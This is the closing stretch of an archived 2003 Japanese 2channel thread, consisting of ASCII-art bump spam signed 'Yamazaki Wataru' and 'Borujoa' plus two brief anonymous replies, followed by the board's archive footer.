━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

886 :山崎渉:03/05/28 17:08
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

887 :山崎 渉:03/07/15 11:17

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

888 :名無しさん@お腹いっぱい。:03/07/15 11:39
>>1
マジ?

889 :名無しさん@お腹いっぱい。:03/07/15 12:01
>>888
糞スレ上げないでよ。というか昔の奴に語りかけても意味ないじゃん

890 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:01
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

891 :山崎 渉:03/08/15 23:26
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

211 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)